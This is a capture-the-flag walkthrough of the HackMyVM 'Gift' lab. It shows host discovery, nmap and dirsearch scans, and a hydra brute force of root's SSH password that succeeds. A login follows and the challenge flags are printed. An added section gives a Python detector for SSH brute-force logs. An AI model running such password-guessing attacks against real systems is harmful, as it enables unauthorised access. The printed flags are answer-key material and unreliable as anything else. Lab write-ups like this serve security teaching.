HackMyVM-Gift

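This article walks through information gathering, port scanning, service identification and web directory enumeration in a virtual machine environment using arp-scan, nmap, dirsearch and hydra, ending with an SSH connection and an attempt to obtain root privileges.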

Contents

Information gathering

arp

nmap

WEB

dirsearch

hydra

SSH connection

get root



Information gathering

arp
┌─[root@parrot]─[~]
└──╼ #arp-scan -l
Interface: enp0s3, type: EN10MB, MAC: 08:00:27:16:3d:f8, IPv4: 192.168.9.102
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.9.106  08:00:27:a3:06:17  PCS Systemtechnik GmbH

Ending arp-scan 1.10.0: 256 hosts scanned in 1.975 seconds (129.62 hosts/sec). 6 res

nmap
Port scan

┌─[root@parrot]─[~/HackMyVM]
└──╼ #nmap -p- 192.168.9.106 --min-rate 10000 -oA port
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-13 10:33 GMT
Stats: 0:00:25 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 93.62% done; ETC: 10:33 (0:00:02 remaining)
Nmap scan report for 192.168.9.106
Host is up (0.00077s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:A3:06:17 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 45.15 seconds

Service version detection

┌─[✗]─[root@parrot]─[~/HackMyVM]
└──╼ #nmap -sC -sV -p 22,80 192.168.9.106 --min-rate 10000 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-13 10:38 GMT
Stats: 0:00:06 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 50.00% done; ETC: 10:38 (0:00:06 remaining)
Nmap scan report for 192.168.9.106
Host is up (0.00058s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.3 (protocol 2.0)
| ssh-hostkey: 
|   3072 2c:1b:36:27:e5:4c:52:7b:3e:10:94:41:39:ef:b2:95 (RSA)
|   256 93:c1:1e:32:24:0e:34:d9:02:0e:ff:c3:9c:59:9b:dd (ECDSA)
|_  256 81:ab:36:ec:b1:2b:5c:d2:86:55:12:0c:51:00:27:d7 (ED25519)
80/tcp open  http    nginx
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:A3:06:17 (Oracle VirtualBox virtual NIC)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.07 seconds


WEB


dirsearch
┌─[root@parrot]─[~/HackMyVM]
└──╼ #dirsearch -u http://192.168.9.106/

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /root/HackMyVM/reports/http_192.168.9.106/__24-04-13_11-15-10.txt

Target: http://192.168.9.106/

[11:15:10] Starting: 

Task Completed

That simple??

hydra
Since port 80 gives us nothing, let's just brute-force port 22!

┌─[roolting@parrot]─[/root/HackMyVM]
└──╼ $hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://192.168.9.106
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-04-13 11:15:59
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.9.106:22/
[STATUS] 146.00 tries/min, 146 tries in 00:01h, 14344256 to do in 1637:29h, 13 active
[22][ssh] host: 192.168.9.106   login: root   password: simple
[STATUS] 4781466.33 tries/min, 14344399 tries in 00:03h, 3 to do in 00:01h, 10 active
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 3 final worker threads did not complete until end.
[ERROR] 3 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-04-13 11:19:19
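
From the defender's side, the hydra run above (146 tries/min against root over SSH) leaves a clear trail in the sshd authentication log. The following added example, which is not part of the original write-up, flags a burst of failed password logins from one source and any password login that succeeds right after it; the log lines are constructed and assume the usual OpenSSH syslog format, and the function name, threshold and window are illustrative choices.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Typical OpenSSH syslog line shape (assumed; adjust for your log pipeline).
LINE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\S+) port \d+"
)

def detect_bruteforce(lines, year=2024, threshold=5, window=timedelta(minutes=1)):
    """Return alerts for sources reaching `threshold` failures within `window`,
    and for password logins that succeed while such a burst is still recent."""
    failures = defaultdict(deque)   # source IP -> timestamps of recent failures
    flagged = set()                 # sources already reported as brute-forcing
    alerts = []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        ip, user = m["ip"], m["user"]
        recent = failures[ip]
        while recent and ts - recent[0] > window:   # drop failures outside the window
            recent.popleft()
        if m["result"] == "Failed":
            recent.append(ts)
            if len(recent) >= threshold and ip not in flagged:
                flagged.add(ip)
                alerts.append(("bruteforce", ip, user))
        elif len(recent) >= threshold:              # success on the heels of a burst
            alerts.append(("success_after_burst", ip, user))
    return alerts

# Constructed sample log (not from the page): six failures in 12 s, then a success,
# plus one ordinary mistyped-then-correct login that must not alert.
SAMPLE = [
    f"Apr 13 11:16:{2 * i:02d} gift sshd[{2100 + i}]: Failed password for root "
    f"from 192.168.9.102 port {40000 + i} ssh2" for i in range(6)
] + [
    "Apr 13 11:16:14 gift sshd[2107]: Accepted password for root from 192.168.9.102 port 40007 ssh2",
    "Apr 13 11:20:00 gift sshd[2200]: Failed password for alice from 192.168.9.50 port 51000 ssh2",
    "Apr 13 11:20:09 gift sshd[2201]: Accepted password for alice from 192.168.9.50 port 51001 ssh2",
]

if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE):
        print(alert)
```

Setting `PermitRootLogin` to `no` or `prohibit-password` in sshd_config removes the password-guessing path against root altogether.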


SSH connection
┌─[roolting@parrot]─[/root/HackMyVM]
└──╼ $ssh root@192.168.9.106
root@192.168.9.106's password: 
IM AN SSH SERVER
gift:~# id
uid=0(root) gid=0(root) groups=0(root),0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
gift:~# 

get root
gift:~# cd /root
gift:~# ls -al
total 20
drwx------    2 root     root          4096 Sep 24  2020 .
drwxr-xr-x   22 root     root          4096 Sep 18  2020 ..
-rw-------    1 root     root            79 Apr 13 11:23 .ash_history
----------    1 root     root            12 Sep 24  2020 root.txt
-rw-rw----    1 root     root            12 Sep 24  2020 user.txt
gift:~# cat *.txt
HMVtyr543FG
HMV665sXzDS

